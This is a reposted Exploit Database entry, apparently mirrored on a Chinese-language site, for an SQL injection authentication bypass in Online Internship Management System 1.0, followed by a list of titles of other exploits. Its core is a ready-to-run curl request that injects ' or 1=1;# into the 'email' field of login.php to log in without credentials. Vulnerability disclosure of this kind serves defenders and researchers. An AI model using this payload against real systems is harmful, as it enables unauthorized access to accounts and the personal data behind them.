Online Internship Management System 1.0 – ’email’ SQL injection Auth Bypass

Exploit Database
19 阅读

作者： Christian Vierschilling

日期： 2021-02-16
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/49564/

# Exploit Title: Online Internship Management System 1.0 - 'email' SQL injection Auth Bypass
# Date: 16-02-2021
# Exploit Author: Christian Vierschilling
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14712/online-internship-management-system-phpmysqli-full-source-code.html
# Version: 1.0
# Tested on: PHP 7.4.14, Linux x64_x86


# --- Description --- #

The application contains sql injections in the parameters 'email' and 'password' in the file 'login.php'. 

# --- Proof of concept --- #

Curl request for authentication bypass via sql injection in parameter 'email':

curl http://x.x.x.x/internship/login.php --data "email='%20or%201=1;#&password=none&login="

last Exploits
Online Internship Management System 1.0 – ’email’ SQL injection Auth Bypass的更多信息

Kryn.cms 0.9 – ‘_kurl’ Cross-Site Scripting：
GLPI 9.5.3 – ‘fromtype’ Unsafe Reflection：
Log1 CMS – ‘writeInfo()’ PHP Code Injection (Metasploit)：
Joomla! Component Social Factory 3.8.3 – SQL Injection：
ManageEngine EventLog Analyzer 10.0 – Information Disclosure：
Phpscript-sgh 0.1.0 – Time Based Blind SQL Injection：
iScripts AutoHoster – ‘invno’ SQL Injection：
Flexpaper PHP Publish Service 2.3.6 – Remote Code Execution：